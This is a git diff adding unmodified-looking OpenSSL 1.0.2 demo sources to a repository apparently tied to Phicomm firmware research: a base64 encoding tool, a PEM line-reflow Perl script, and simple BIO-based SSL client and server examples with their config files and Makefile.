+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "../apps/apps.h"
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+#undef SIZE
+#undef BSIZE
+#undef PROG
+
+#define SIZE    (512)
+#define BSIZE   (8*1024)
+#define PROG    enc_main
+
+int main(argc, argv)
+int argc;
+char **argv;
+{
+    char *strbuf = NULL;
+    unsigned char *buff = NULL, *bufsize = NULL;
+    int bsize = BSIZE, verbose = 0;
+    int ret = 1, inl;
+    char *str = NULL;
+    char *hkey = NULL, *hiv = NULL;
+    int enc = 1, printkey = 0, i, base64 = 0;
+    int debug = 0;
+    EVP_CIPHER *cipher = NULL, *c;
+    char *inf = NULL, *outf = NULL;
+    BIO *in = NULL, *out = NULL, *b64 = NULL, *benc = NULL, *rbio =
+        NULL, *wbio = NULL;
+#define PROG_NAME_SIZE  39
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE);
+
+    base64 = 1;
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-e") == 0)
+            enc = 1;
+        if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inf = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outf = *(++argv);
+        } else if (strcmp(*argv, "-d") == 0)
+            enc = 0;
+        else if (strcmp(*argv, "-v") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-debug") == 0)
+            debug = 1;
+        else if (strcmp(*argv, "-bufsize") == 0) {
+            if (--argc < 1)
+                goto bad;
+            bufsize = (unsigned char *)*(++argv);
+        } else {
+            BIO_printf(bio_err, "unknown option '%s'\n", *argv);
+ bad:
+            BIO_printf(bio_err, "options are\n");
+            BIO_printf(bio_err, "%-14s input file\n", "-in <file>");
+            BIO_printf(bio_err, "%-14s output file\n", "-out <file>");
+            BIO_printf(bio_err, "%-14s encode\n", "-e");
+            BIO_printf(bio_err, "%-14s decode\n", "-d");
+            BIO_printf(bio_err, "%-14s buffer size\n", "-bufsize <n>");
+
+            goto end;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (bufsize != NULL) {
+        int i;
+        unsigned long n;
+
+        for (n = 0; *bufsize; bufsize++) {
+            i = *bufsize;
+            if ((i <= '9') && (i >= '0'))
+                n = n * 10 + i - '0';
+            else if (i == 'k') {
+                n *= 1024;
+                bufsize++;
+                break;
+            }
+        }
+        if (*bufsize != '\0') {
+            BIO_printf(bio_err, "invalid 'bufsize' specified.\n");
+            goto end;
+        }
+
+        /* It must be large enough for a base64 encoded line */
+        if (n < 80)
+            n = 80;
+
+        bsize = (int)n;
+        if (verbose)
+            BIO_printf(bio_err, "bufsize=%d\n", bsize);
+    }
+
+    strbuf = OPENSSL_malloc(SIZE);
+    buff = (unsigned char *)OPENSSL_malloc(EVP_ENCODE_LENGTH(bsize));
+    if ((buff == NULL) || (strbuf == NULL)) {
+        BIO_printf(bio_err, "OPENSSL_malloc failure\n");
+        goto end;
+    }
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if (debug) {
+        BIO_set_callback(in, BIO_debug_callback);
+        BIO_set_callback(out, BIO_debug_callback);
+        BIO_set_callback_arg(in, bio_err);
+        BIO_set_callback_arg(out, bio_err);
+    }
+
+    if (inf == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, inf) <= 0) {
+            perror(inf);
+            goto end;
+        }
+    }
+
+    if (outf == NULL)
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+    else {
+        if (BIO_write_filename(out, outf) <= 0) {
+            perror(outf);
+            goto end;
+        }
+    }
+
+    rbio = in;
+    wbio = out;
+
+    if (base64) {
+        if ((b64 = BIO_new(BIO_f_base64())) == NULL)
+            goto end;
+        if (debug) {
+            BIO_set_callback(b64, BIO_debug_callback);
+            BIO_set_callback_arg(b64, bio_err);
+        }
+        if (enc)
+            wbio = BIO_push(b64, wbio);
+        else
+            rbio = BIO_push(b64, rbio);
+    }
+
+    for (;;) {
+        inl = BIO_read(rbio, (char *)buff, bsize);
+        if (inl <= 0)
+            break;
+        if (BIO_write(wbio, (char *)buff, inl) != inl) {
+            BIO_printf(bio_err, "error writing output file\n");
+            goto end;
+        }
+    }
+    BIO_flush(wbio);
+
+    ret = 0;
+    if (verbose) {
+        BIO_printf(bio_err, "bytes read   :%8ld\n", BIO_number_read(in));
+        BIO_printf(bio_err, "bytes written:%8ld\n", BIO_number_written(out));
+    }
+ end:
+    if (strbuf != NULL)
+        OPENSSL_free(strbuf);
+    if (buff != NULL)
+        OPENSSL_free(buff);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free(out);
+    if (benc != NULL)
+        BIO_free(benc);
+    if (b64 != NULL)
+        BIO_free(b64);
+    EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.pl
new file mode 100644
index 0000000..8aa5fb4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.pl
@@ -0,0 +1,20 @@
+#!/usr/local/bin/perl
+
+#
+# Make PEM encoded data have lines of 64 bytes of data
+#
+
+while (<>)
+	{
+	if (/^-----BEGIN/ .. /^-----END/)
+		{
+		if (/^-----BEGIN/) { $first=$_; next; }
+		if (/^-----END/) { $last=$_; next; }
+		$out.=$_;
+		}
+	}
+$out =~ s/\s//g;
+$out =~ s/(.{64})/$1\n/g;
+print "$first$out\n$last\n";
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/Makefile
new file mode 100644
index 0000000..f8c8f03
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/Makefile
@@ -0,0 +1,22 @@
+CC=cc
+CFLAGS= -g -I../../include
+LIBS= -L../.. ../../libssl.a ../../libcrypto.a -ldl
+EXAMPLES=saccept sconnect client-arg client-conf
+
+all: $(EXAMPLES) 
+
+saccept: saccept.o
+	$(CC) -o saccept saccept.o $(LIBS)
+
+sconnect: sconnect.o
+	$(CC) -o sconnect sconnect.o $(LIBS)
+
+client-arg: client-arg.o
+	$(CC) -o client-arg client-arg.o $(LIBS)
+
+client-conf: client-conf.o
+	$(CC) -o client-conf client-conf.o $(LIBS)
+
+clean:	
+	rm -f $(EXAMPLES) *.o
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/README
new file mode 100644
index 0000000..a36bb48
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/README
@@ -0,0 +1,7 @@
+This directory contains some simple examples of the use of BIO's
+to simplify socket programming.
+
+The client-conf, server-conf, client-arg and client-conf include examples
+of how to use the SSL_CONF API for configuration file or command line
+processing.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/accept.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/accept.cnf
new file mode 100644
index 0000000..e4acea7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/accept.cnf
@@ -0,0 +1,13 @@
+# Example configuration file
+# Port to listen on
+Port = 4433
+# Disable TLS v1.2 for test.
+# Protocol = ALL, -TLSv1.2
+# Only support 3 curves
+Curves = P-521:P-384:P-256
+# Automatic curve selection
+ECDHParameters = Automatic
+# Restricted signature algorithms
+SignatureAlgorithms = RSA+SHA512:ECDSA+SHA512 
+Certificate=server.pem
+PrivateKey=server.pem
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-arg.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-arg.c
new file mode 100644
index 0000000..dc354ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-arg.c
@@ -0,0 +1,111 @@
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+int main(int argc, char **argv)
+{
+    BIO *sbio = NULL, *out = NULL;
+    int len;
+    char tmpbuf[1024];
+    SSL_CTX *ctx;
+    SSL_CONF_CTX *cctx;
+    SSL *ssl;
+    char **args = argv + 1;
+    const char *connect_str = "localhost:4433";
+    int nargs = argc - 1;
+
+    ERR_load_crypto_strings();
+    ERR_load_SSL_strings();
+    SSL_library_init();
+
+    ctx = SSL_CTX_new(SSLv23_client_method());
+    cctx = SSL_CONF_CTX_new();
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CLIENT);
+    SSL_CONF_CTX_set_ssl_ctx(cctx, ctx);
+    while (*args && **args == '-') {
+        int rv;
+        /* Parse standard arguments */
+        rv = SSL_CONF_cmd_argv(cctx, &nargs, &args);
+        if (rv == -3) {
+            fprintf(stderr, "Missing argument for %s\n", *args);
+            goto end;
+        }
+        if (rv < 0) {
+            fprintf(stderr, "Error in command %s\n", *args);
+            ERR_print_errors_fp(stderr);
+            goto end;
+        }
+        /* If rv > 0 we processed something so proceed to next arg */
+        if (rv > 0)
+            continue;
+        /* Otherwise application specific argument processing */
+        if (!strcmp(*args, "-connect")) {
+            connect_str = args[1];
+            if (connect_str == NULL) {
+                fprintf(stderr, "Missing -connect argument\n");
+                goto end;
+            }
+            args += 2;
+            nargs -= 2;
+            continue;
+        } else {
+            fprintf(stderr, "Unknown argument %s\n", *args);
+            goto end;
+        }
+    }
+
+    if (!SSL_CONF_CTX_finish(cctx)) {
+        fprintf(stderr, "Finish error\n");
+        ERR_print_errors_fp(stderr);
+        goto err;
+    }
+
+    /*
+     * We'd normally set some stuff like the verify paths and * mode here
+     * because as things stand this will connect to * any server whose
+     * certificate is signed by any CA.
+     */
+
+    sbio = BIO_new_ssl_connect(ctx);
+
+    BIO_get_ssl(sbio, &ssl);
+
+    if (!ssl) {
+        fprintf(stderr, "Can't locate SSL pointer\n");
+        goto end;
+    }
+
+    /* Don't want any retries */
+    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
+
+    /* We might want to do other things with ssl here */
+
+    BIO_set_conn_hostname(sbio, connect_str);
+
+    out = BIO_new_fp(stdout, BIO_NOCLOSE);
+    if (BIO_do_connect(sbio) <= 0) {
+        fprintf(stderr, "Error connecting to server\n");
+        ERR_print_errors_fp(stderr);
+        goto end;
+    }
+
+    if (BIO_do_handshake(sbio) <= 0) {
+        fprintf(stderr, "Error establishing SSL connection\n");
+        ERR_print_errors_fp(stderr);
+        goto end;
+    }
+
+    /* Could examine ssl here to get connection info */
+
+    BIO_puts(sbio, "GET / HTTP/1.0\n\n");
+    for (;;) {
+        len = BIO_read(sbio, tmpbuf, 1024);
+        if (len <= 0)
+            break;
+        BIO_write(out, tmpbuf, len);
+    }
+ end:
+    SSL_CONF_CTX_free(cctx);
+    BIO_free_all(sbio);
+    BIO_free(out);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-conf.c
new file mode 100644
index 0000000..150e7fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/client-conf.c
@@ -0,0 +1,120 @@
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+#include <openssl/conf.h>
+
+int main(int argc, char **argv)
+{
+    BIO *sbio = NULL, *out = NULL;
+    int i, len, rv;
+    char tmpbuf[1024];
+    SSL_CTX *ctx = NULL;
+    SSL_CONF_CTX *cctx = NULL;
+    SSL *ssl = NULL;
+    CONF *conf = NULL;
+    STACK_OF(CONF_VALUE) *sect = NULL;
+    CONF_VALUE *cnf;
+    const char *connect_str = "localhost:4433";
+    long errline = -1;
+
+    ERR_load_crypto_strings();
+    ERR_load_SSL_strings();
+    SSL_library_init();
+
+    conf = NCONF_new(NULL);
+
+    if (NCONF_load(conf, "connect.cnf", &errline) <= 0) {
+        if (errline <= 0)
+            fprintf(stderr, "Error processing config file\n");
+        else
+            fprintf(stderr, "Error on line %ld\n", errline);
+        goto end;
+    }
+
+    sect = NCONF_get_section(conf, "default");
+
+    if (sect == NULL) {
+        fprintf(stderr, "Error retrieving default section\n");
+        goto end;
+    }
+
+    ctx = SSL_CTX_new(SSLv23_client_method());
+    cctx = SSL_CONF_CTX_new();
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CLIENT);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_FILE);
+    SSL_CONF_CTX_set_ssl_ctx(cctx, ctx);
+    for (i = 0; i < sk_CONF_VALUE_num(sect); i++) {
+        cnf = sk_CONF_VALUE_value(sect, i);
+        rv = SSL_CONF_cmd(cctx, cnf->name, cnf->value);
+        if (rv > 0)
+            continue;
+        if (rv != -2) {
+            fprintf(stderr, "Error processing %s = %s\n",
+                    cnf->name, cnf->value);
+            ERR_print_errors_fp(stderr);
+            goto end;
+        }
+        if (!strcmp(cnf->name, "Connect")) {
+            connect_str = cnf->value;
+        } else {
+            fprintf(stderr, "Unknown configuration option %s\n", cnf->name);
+            goto end;
+        }
+    }
+
+    if (!SSL_CONF_CTX_finish(cctx)) {
+        fprintf(stderr, "Finish error\n");
+        ERR_print_errors_fp(stderr);
+        goto err;
+    }
+
+    /*
+     * We'd normally set some stuff like the verify paths and * mode here
+     * because as things stand this will connect to * any server whose
+     * certificate is signed by any CA.
+     */
+
+    sbio = BIO_new_ssl_connect(ctx);
+
+    BIO_get_ssl(sbio, &ssl);
+
+    if (!ssl) {
+        fprintf(stderr, "Can't locate SSL pointer\n");
+        goto end;
+    }
+
+    /* Don't want any retries */
+    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
+
+    /* We might want to do other things with ssl here */
+
+    BIO_set_conn_hostname(sbio, connect_str);
+
+    out = BIO_new_fp(stdout, BIO_NOCLOSE);
+    if (BIO_do_connect(sbio) <= 0) {
+        fprintf(stderr, "Error connecting to server\n");
+        ERR_print_errors_fp(stderr);
+        goto end;
+    }
+
+    if (BIO_do_handshake(sbio) <= 0) {
+        fprintf(stderr, "Error establishing SSL connection\n");
+        ERR_print_errors_fp(stderr);
+        goto end;
+    }
+
+    /* Could examine ssl here to get connection info */
+
+    BIO_puts(sbio, "GET / HTTP/1.0\n\n");
+    for (;;) {
+        len = BIO_read(sbio, tmpbuf, 1024);
+        if (len <= 0)
+            break;
+        BIO_write(out, tmpbuf, len);
+    }
+ end:
+    SSL_CONF_CTX_free(cctx);
+    BIO_free_all(sbio);
+    BIO_free(out);
+    NCONF_free(conf);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/connect.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/connect.cnf
new file mode 100644
index 0000000..4dee03c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/connect.cnf
@@ -0,0 +1,9 @@
+# Example configuration file
+# Connects to the default port of s_server
+Connect = localhost:4433
+# Disable TLS v1.2 for test.
+# Protocol = ALL, -TLSv1.2
+# Only support 3 curves
+Curves = P-521:P-384:P-256
+# Restricted signature algorithms
+SignatureAlgorithms = RSA+SHA512:ECDSA+SHA512 
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/saccept.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/saccept.c
new file mode 100644
index 0000000..e79c872
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/saccept.c
@@ -0,0 +1,117 @@
+/* NOCW */
+/* demos/bio/saccept.c */
+
+/*-
+ * A minimal program to serve an SSL connection.
+ * It uses blocking.
+ * saccept host:port
+ * host is the interface IP to use.  If any interface, use *:port
+ * The default it *:4433
+ *
+ * cc -I../../include saccept.c -L../.. -lssl -lcrypto -ldl
+ */
+
+#include <stdio.h>
+#include <signal.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+#define CERT_FILE       "server.pem"
+
+BIO *in = NULL;
+
+void close_up()
+{
+    if (in != NULL)
+        BIO_free(in);
+}
+
+int main(argc, argv)
+int argc;
+char *argv[];
+{
+    char *port = NULL;
+    BIO *ssl_bio, *tmp;
+    SSL_CTX *ctx;
+    SSL *ssl;
+    char buf[512];
+    int ret = 1, i;
+
+    if (argc <= 1)
+        port = "*:4433";
+    else
+        port = argv[1];
+
+    signal(SIGINT, close_up);
+
+    SSL_load_error_strings();
+
+#ifdef WATT32
+    dbug_init();
+    sock_init();
+#endif
+
+    /* Add ciphers and message digests */
+    OpenSSL_add_ssl_algorithms();
+
+    ctx = SSL_CTX_new(SSLv23_server_method());
+    if (!SSL_CTX_use_certificate_file(ctx, CERT_FILE, SSL_FILETYPE_PEM))
+        goto err;
+    if (!SSL_CTX_use_PrivateKey_file(ctx, CERT_FILE, SSL_FILETYPE_PEM))
+        goto err;
+    if (!SSL_CTX_check_private_key(ctx))
+        goto err;
+
+    /* Setup server side SSL bio */
+    ssl = SSL_new(ctx);
+    ssl_bio = BIO_new_ssl(ctx, 0);
+
+    if ((in = BIO_new_accept(port)) == NULL)
+        goto err;
+
+    /*
+     * This means that when a new connection is accepted on 'in', The ssl_bio
+     * will be 'duplicated' and have the new socket BIO push into it.
+     * Basically it means the SSL BIO will be automatically setup
+     */
+    BIO_set_accept_bios(in, ssl_bio);
+
+ again:
+    /*
+     * The first call will setup the accept socket, and the second will get a
+     * socket.  In this loop, the first actual accept will occur in the
+     * BIO_read() function.
+     */
+
+    if (BIO_do_accept(in) <= 0)
+        goto err;
+
+    for (;;) {
+        i = BIO_read(in, buf, 512);
+        if (i == 0) {
+            /*
+             * If we have finished, remove the underlying BIO stack so the
+             * next time we call any function for this BIO, it will attempt
+             * to do an accept
+             */
+            printf("Done\n");
+            tmp = BIO_pop(in);
+            BIO_free_all(tmp);
+            goto again;
+        }
+        if (i < 0)
+            goto err;
+        fwrite(buf, 1, i, stdout);
+        fflush(stdout);
+    }
+
+    ret = 0;
+ err:
+    if (ret) {
+        ERR_print_errors_fp(stderr);
+    }
+    if (in != NULL)
+        BIO_free(in);
+    exit(ret);
+    return (!ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/sconnect.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/sconnect.c
new file mode 100644
index 0000000..e6eddb1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/sconnect.c
@@ -0,0 +1,113 @@
+/* NOCW */
+/* demos/bio/sconnect.c */
+
+/*-
+ * A minimal program to do SSL to a passed host and port.
+ * It is actually using non-blocking IO but in a very simple manner
+ * sconnect host:port - it does a 'GET / HTTP/1.0'
+ *
+ * cc -I../../include sconnect.c -L../.. -lssl -lcrypto
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+extern int errno;
+
+int main(argc, argv)
+int argc;
+char *argv[];
+{
+    char *host;
+    BIO *out;
+    char buf[1024 * 10], *p;
+    SSL_CTX *ssl_ctx = NULL;
+    SSL *ssl;
+    BIO *ssl_bio;
+    int i, len, off, ret = 1;
+
+    if (argc <= 1)
+        host = "localhost:4433";
+    else
+        host = argv[1];
+
+#ifdef WATT32
+    dbug_init();
+    sock_init();
+#endif
+
+    /* Lets get nice error messages */
+    SSL_load_error_strings();
+
+    /* Setup all the global SSL stuff */
+    OpenSSL_add_ssl_algorithms();
+    ssl_ctx = SSL_CTX_new(SSLv23_client_method());
+
+    /* Lets make a SSL structure */
+    ssl = SSL_new(ssl_ctx);
+    SSL_set_connect_state(ssl);
+
+    /* Use it inside an SSL BIO */
+    ssl_bio = BIO_new(BIO_f_ssl());
+    BIO_set_ssl(ssl_bio, ssl, BIO_CLOSE);
+
+    /* Lets use a connect BIO under the SSL BIO */
+    out = BIO_new(BIO_s_connect());
+    BIO_set_conn_hostname(out, host);
+    BIO_set_nbio(out, 1);
+    out = BIO_push(ssl_bio, out);
+
+    p = "GET / HTTP/1.0\r\n\r\n";
+    len = strlen(p);
+
+    off = 0;
+    for (;;) {
+        i = BIO_write(out, &(p[off]), len);
+        if (i <= 0) {
+            if (BIO_should_retry(out)) {
+                fprintf(stderr, "write DELAY\n");
+                sleep(1);
+                continue;
+            } else {
+                goto err;
+            }
+        }
+        off += i;
+        len -= i;
+        if (len <= 0)
+            break;
+    }
+
+    for (;;) {
+        i = BIO_read(out, buf, sizeof(buf));
+        if (i == 0)
+            break;
+        if (i < 0) {
+            if (BIO_should_retry(out)) {
+                fprintf(stderr, "read DELAY\n");
+                sleep(1);
+                continue;
+            }
+            goto err;
+        }
+        fwrite(buf, 1, i, stdout);
+    }
+
+    ret = 1;
+
+    if (0) {
+ err:
+        if (ERR_peek_error() == 0) { /* system call error */
+            fprintf(stderr, "errno=%d ", errno);
+            perror("error");
+        } else
+            ERR_print_errors_fp(stderr);
+    }
+    BIO_free_all(out);
+    if (ssl_ctx != NULL)
+        SSL_CTX_free(ssl_ctx);
+    exit(!ret);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-arg.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-arg.c
new file mode 100644
index 0000000..1d0e1db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-arg.c
@@ -0,0 +1,144 @@
+/* NOCW */
+/* demos/bio/server-arg.c */
+
+/*
+ * A minimal program to serve an SSL connection. It uses blocking. It use the
+ * SSL_CONF API with the command line. cc -I../../include server-arg.c
+ * -L../.. -lssl -lcrypto -ldl
+ */
+
+#include <stdio.h>
+#include <signal.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+int main(int argc, char *argv[])
+{
+    char *port = "*:4433";
+    BIO *ssl_bio, *tmp;
+    SSL_CTX *ctx;
+    SSL_CONF_CTX *cctx;
+    char buf[512];
+    BIO *in = NULL;
+    int ret = 1, i;
+    char **args = argv + 1;
+    int nargs = argc - 1;
+
+    SSL_load_error_strings();
+
+    /* Add ciphers and message digests */
+    OpenSSL_add_ssl_algorithms();
+
+    ctx = SSL_CTX_new(SSLv23_server_method());
+
+    cctx = SSL_CONF_CTX_new();
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_SERVER);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CERTIFICATE);
+    SSL_CONF_CTX_set_ssl_ctx(cctx, ctx);
+    while (*args && **args == '-') {
+        int rv;
+        /* Parse standard arguments */
+        rv = SSL_CONF_cmd_argv(cctx, &nargs, &args);
+        if (rv == -3) {
+            fprintf(stderr, "Missing argument for %s\n", *args);
+            goto err;
+        }
+        if (rv < 0) {
+            fprintf(stderr, "Error in command %s\n", *args);
+            ERR_print_errors_fp(stderr);
+            goto err;
+        }
+        /* If rv > 0 we processed something so proceed to next arg */
+        if (rv > 0)
+            continue;
+        /* Otherwise application specific argument processing */
+        if (!strcmp(*args, "-port")) {
+            port = args[1];
+            if (port == NULL) {
+                fprintf(stderr, "Missing -port argument\n");
+                goto err;
+            }
+            args += 2;
+            nargs -= 2;
+            continue;
+        } else {
+            fprintf(stderr, "Unknown argument %s\n", *args);
+            goto err;
+        }
+    }
+
+    if (!SSL_CONF_CTX_finish(cctx)) {
+        fprintf(stderr, "Finish error\n");
+        ERR_print_errors_fp(stderr);
+        goto err;
+    }
+#if 0
+    /*
+     * Demo of how to iterate over all certificates in an SSL_CTX structure.
+     */
+    {
+        X509 *x;
+        int rv;
+        rv = SSL_CTX_set_current_cert(ctx, SSL_CERT_SET_FIRST);
+        while (rv) {
+            X509 *x = SSL_CTX_get0_certificate(ctx);
+            X509_NAME_print_ex_fp(stdout, X509_get_subject_name(x), 0,
+                                  XN_FLAG_ONELINE);
+            printf("\n");
+            rv = SSL_CTX_set_current_cert(ctx, SSL_CERT_SET_NEXT);
+        }
+        fflush(stdout);
+    }
+#endif
+    /* Setup server side SSL bio */
+    ssl_bio = BIO_new_ssl(ctx, 0);
+
+    if ((in = BIO_new_accept(port)) == NULL)
+        goto err;
+
+    /*
+     * This means that when a new connection is accepted on 'in', The ssl_bio
+     * will be 'duplicated' and have the new socket BIO push into it.
+     * Basically it means the SSL BIO will be automatically setup
+     */
+    BIO_set_accept_bios(in, ssl_bio);
+
+ again:
+    /*
+     * The first call will setup the accept socket, and the second will get a
+     * socket.  In this loop, the first actual accept will occur in the
+     * BIO_read() function.
+     */
+
+    if (BIO_do_accept(in) <= 0)
+        goto err;
+
+    for (;;) {
+        i = BIO_read(in, buf, 512);
+        if (i == 0) {
+            /*
+             * If we have finished, remove the underlying BIO stack so the
+             * next time we call any function for this BIO, it will attempt
+             * to do an accept
+             */
+            printf("Done\n");
+            tmp = BIO_pop(in);
+            BIO_free_all(tmp);
+            goto again;
+        }
+        if (i < 0)
+            goto err;
+        fwrite(buf, 1, i, stdout);
+        fflush(stdout);
+    }
+
+    ret = 0;
+ err:
+    if (ret) {
+        ERR_print_errors_fp(stderr);
+    }
+    if (in != NULL)
+        BIO_free(in);
+    exit(ret);
+    return (!ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-conf.c
new file mode 100644
index 0000000..a09bc93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server-conf.c
@@ -0,0 +1,138 @@
+/* NOCW */
+/* demos/bio/saccept-conf.c */
+
+/*
+ * A minimal program to serve an SSL connection. It uses blocking. It uses
+ * the SSL_CONF API with a configuration file. cc -I../../include saccept.c
+ * -L../.. -lssl -lcrypto -ldl
+ */
+
+#include <stdio.h>
+#include <signal.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+#include <openssl/conf.h>
+
+int main(int argc, char *argv[])
+{
+    char *port = "*:4433";
+    BIO *in = NULL;
+    BIO *ssl_bio, *tmp;
+    SSL_CTX *ctx;
+    SSL_CONF_CTX *cctx = NULL;
+    CONF *conf = NULL;
+    STACK_OF(CONF_VALUE) *sect = NULL;
